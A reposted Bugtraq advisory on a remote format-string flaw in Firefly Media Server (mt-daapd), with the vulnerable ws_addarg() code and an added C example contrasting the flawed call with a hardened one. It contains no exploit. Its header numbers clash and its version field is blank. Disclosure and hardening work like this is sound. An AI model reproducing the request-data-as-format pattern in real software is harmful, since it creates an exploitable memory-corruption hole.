[UPH-07-03] Firefly Media Server remote format string vulnerabil

Board: Bugtraq, posted 2007/11/03 02:13
[UPH-07-02]
UnprotectedHex.com security advisory [07-02]
Discovered by nnp

Discovered : 1 August 2007
Reported to the vendor : 13 October 2007
Fixed by vendor : 21 October 2007

Vulnerability class : Remote format string

Affected product : mt-daapd/Firefly Media Server
Version :

    /* username and password are taken from the request and passed
       in the fmt position of ws_addarg() */
    ws_addarg(&pwsc->request_vars,"HTTP_USER",username);
    ws_addarg(&pwsc->request_vars,"HTTP_PASSWD",password);

    int ws_addarg(ARGLIST *root, char *key, char *fmt, ...) {
    ....
        va_start(ap,fmt);
        /* fmt is interpreted as a printf format string here */
        vsnprintf(value,sizeof(value),fmt,ap);
        va_end(ap);

Proof of concept code : Yes

--
http://www.smashthestack.org
http://www.unprotectedhex.com
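Added example (not part of the advisory and not the project's code): a minimal C model of the call pattern shown above, next to the same call with a constant "%s" format, so the difference in how request data is treated is visible on a harmless input. The names arg_slot, addarg, store_as_format and store_as_data are hypothetical, and the sample input is constructed.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for the advisory's ARGLIST: one key/value slot. */
typedef struct { char key[32]; char value[256]; } arg_slot;

/* Same shape as ws_addarg(): the third parameter is a printf format.
 * The attribute lets GCC/Clang check every call site; -Wformat-security
 * then flags a non-literal format passed with no arguments. */
static int addarg(arg_slot *slot, const char *key, const char *fmt, ...)
    __attribute__((format(printf, 3, 4)));

static int addarg(arg_slot *slot, const char *key, const char *fmt, ...)
{
    va_list ap;
    int n;

    snprintf(slot->key, sizeof slot->key, "%s", key);
    va_start(ap, fmt);
    n = vsnprintf(slot->value, sizeof slot->value, fmt, ap);
    va_end(ap);
    return (n < 0 || (size_t)n >= sizeof slot->value) ? -1 : 0;
}

/* Call pattern from the advisory: request data in the format position. */
static const char *store_as_format(arg_slot *slot, const char *user)
{
    addarg(slot, "HTTP_USER", user);
    return slot->value;
}

/* Hardened call: constant format, request data only as an argument. */
static const char *store_as_data(arg_slot *slot, const char *user)
{
    addarg(slot, "HTTP_USER", "%s", user);
    return slot->value;
}

int main(void)
{
    arg_slot s;
    const char *sample = "50%% off";   /* constructed input, not from the page */

    printf("as format: %s\n", store_as_format(&s, sample)); /* 50% off */
    printf("as data:   %s\n", store_as_data(&s, sample));   /* 50%% off */
    return 0;
}
```

Compiling with -Wformat -Wformat-security makes GCC or Clang warn at the call inside store_as_format, which is how this class of call site can be found during review.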
Article ID (AID): #17AsYt00 (Bugtraq)